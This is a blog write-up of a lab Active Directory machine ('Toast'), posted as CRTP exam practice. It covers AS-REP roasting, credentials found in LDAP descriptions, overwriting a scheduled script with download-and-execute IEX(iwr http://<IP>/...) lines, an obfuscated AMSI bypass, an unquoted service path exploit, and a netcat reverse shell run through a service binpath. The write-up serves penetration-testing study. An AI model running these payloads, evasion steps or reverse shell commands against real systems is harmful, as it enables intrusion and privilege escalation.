1# CRTP Series | CyberSecLabs : Toast Write-up
Updated: Nov 10, 2021
This is the 1st blog out of a series of blogs I will be publishing on vulnerable machines in preparation for the CRTP exam.
You can access my Gitbook repository here for all the commands.
First we run an nmap scan to see which ports are open and the services running on them.
-Pn : Skip host discovery [Don't ping]
-p- : Scan all 65535 ports
-oA : Save output to file
Let's run an aggressive nmap scan to enumerate the services on all open ports.
-A : Enable OS detection, version detection, script scanning, and traceroute
Looking at ports 389(LDAP) and 88(Kerberos), our target is likely a Domain Controller.
Domain Name : Toast.csl | Hostname: TOAST-DC
The SMB service stands out from all the services, and that's where we'll start poking.
We have anonymous read access on 2 shares, but nothing useful in there.
Interestingly, we now have 2 usernames:
If we did not know this, we could enumerate valid users using GetNPUsers.py from impacket with a username wordlist from Seclist.
Let's see if any of the users have Kerberos-Pre-authentication disabled. If yes, we could grab the user's crackable AS-REP and brute-force it offline.
Let's take a deeper look at how this attack works.
If a user's UserAccountControl settings have "Do not require Kerberos preauthentication" enabled i.e. Kerberos preauth is disabled, it is possible to grab user's crackable AS-REP and brute-force it offline.
With sufficient rights (GenericWrite or GenericAll), Kerberos preauth can be forced disabled as well.
[AS-REQ] Timestamp is encrypted with the NTLM hash of the user and sent to KDC. This is when Pre-Auth is enabled. KDC knows that the request came from the specific user. If disabled, this step can be spoofed.
[AS-REP] KDC creates a TGT which is encrypted. It contains an additional information which is signed with the user's NTLM hash.
Attacker grabs the AS-REP and cracks the user's NTLM hash offline.
Reference: Harmjoy's blog
Using GetNPUsers.py from impacket we were able to identify that user 'Karen' has Kerberos Preauth disabled. The AS-REP is stored in a format readable by john. Crack the NTLM hash with rockyou.txt as the wordlist.
Great, we've owned user Karen!
Remember that LDAP(port 389) was open. Let's manually enumerate LDAP as user Karen.
First we need to identify the naming context. Let's use python3.
Next, let's grab the "Description" for all objects. Why you ask? Administrators are known to save passwords in the "Description" of the object, especially when there are roles requiring double-shifts where different users share passwords. Obviously unaware that they could be accessed by bad-actors
Looks like we've got user Potato's credentials! Let's revisit enumeration of shares with Potato's privileges.
We have READ/WRITE access on Potato share.
ClearLogs.ps1 appears to be running as a cronjob every minute.
We could possible replace it's contents to grab a reverse shell onto the target.
The traditional method of gaining a foothold using Invoke-PowershellTcp.ps1 or delivering the payload using SMB do not work. Although we can observe the target's requests to our web-server, we do not get a shell as Defender and AMSI seem to be causing problems.
To overcome this, let's use this AMSI bypass. Shout-out to PinkDraconian for this.
Additionally we'll need to obfuscate the bypass code using ISESteroids.
Obfuscation of AMSI Bypass
1. To install ISESteroids, run this in Powershell:
Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force
2. Start a Powershell ISE Editor and run:
3. Copy the AMSI Bypass code to the editor and obfuscate the code.
4. Save the output as amsibypass.ps1
Download Invoke-PowerShellTcp.ps1 and append to it's end:
Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port No>
Copy both scripts to a folder and host it on a web server.
python -m SimpleHTTPServer
Let's replace ClearLogs.ps1 with the below content:
IEX(iwr http://<IP>/amsibypass.ps1 -UseBasicParsing); IEX(iwr http://<IP>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);
Copy it to the Potato Share by logging into SMB:
smbclient \\\\172.31.3.8\\Potato -U "Potato"%"W2CUvphqXB" put ClearLogs.ps1
The idea is to get the cronjob to download both scripts and execute in memory. Soon enough, we get a callback, followed by a reverse shell!
To get a more stable shell, I downloaded netcat onto the target to create a new shell.
We've got our first flag!
To automate the Local Windows Privilege Escalation checklist, download & execute winPEAS on the target. Right away we observe a red flag. There exists a misconfigured service, 'HellEscape', with an Unquoted Service Path. Checking if we have permissions to restart 'HellEscape' using Service Controller Utility(sc), and sure enough we do!
Let's take a deeper look at how this local privilege escalation attack works:
Unquoted Service Path Abuse
Services in windows have a binpath(Binary Path) which contains the command the service runs when it starts. If we use the sc utility to display the config of a service, among other information, we have the BINARY_PATH_NAME.
Weird stuff can happen if we do not use quotes in the BINARY_PATH_NAME.
Executables can take arguments, generally separated by spaces or executables can be references by using their absolute paths. Paths can also have spaces in them. Let's understand how windows interprets unquoted service paths:
Services that have a space in it's path with no quote.
Write permissions in the required folder.
Target a service which:
We have permissions to restart.
Runs with elevated privileges.
In this case, when 'HellEscape' is started, the system tries to interpret the possibilities in the following order:
c:\Program Files\Purgatory\Up For.exe and so on..
If an attacker is able to place a malicious executable in one of these unexpected paths, he can elevate privileges to the user running the service.
Now that we've got that covered, lets generate a reverse shell payload, rename it to 'Up.exe' and place in the write-able directory: c:\Program Files\Purgatory\Up.exe
Like before, we will need to bypass AMSI using amsibypass.ps1 before running the malicious executable. To make things simple, I've compiled Clearlogs.ps1 into an exe using PS2-EXE.
#Clearlogs.ps1 IEX(iwr http://<IP>/amsibypass.ps1 -UseBasicParsing); IEX(iwr http://<IP>/Invoke-PowerShellTcp.ps1 -UseBasicParsing);
Remember to make necessary port no: changes within Invoke-PowerShellTcp.ps1
'HellEscape' runs with privileges of 'Serviceuser'.
We have write-permissions in the required directory as well as restart permissions to exploit the Unquoted Service Path misconfiguration.
Compile Clearlogs.ps1 into script.exe
Transfer it over to the write-able directory as :
Set up a listener using netcat.
Start 'HellEscape' using sc.
As you can see above, I've used netcat again to get a more stable shell. We now have privileges of Serviceuser!
Once again, I've used winPEAS to see what's in store for us as 'Serviceuser'.
We can see that service 'UsoSvc' is affected by a Security misconfiguration vulnerability. We have Full Access on it's binary path and it runs as LocalSystem(Admin privileges). What does this mean? Well, we can re-configure the BIN_PATH_NAME to run any command or any binary of our choosing when 'UsoSvc' is started. Ideal for elevating privileges. For example:
Add our user to the Administrator's group :
net localgroup administrators toast\Serviceuser /add
Get a reverse shell:
c:\<Directory>\nc.exe <IP> <port no:> -e c:\Windows\system32\cmd.exe
Let's use the reverse shell method to elevate privileges to SYSTEM. We can use sc to modify the binpath and restart the service.
The System Flag is ours.
Valid usernames were enumerated.
User Karen had Kerberos-Pre-authentication disabled and a weak password configured. This enabled us to grab the AS-REP and crack the hash offline.
User Potato's password was exposed in the object 'Description'
The service 'HellEscape' was misconfigured with an Unquoted Service Path, which aided us to laterally obtain Serviceuser's privileges.
The service 'UsoSvc' had misconfigured permissions which helped us elevate to LocalSystem.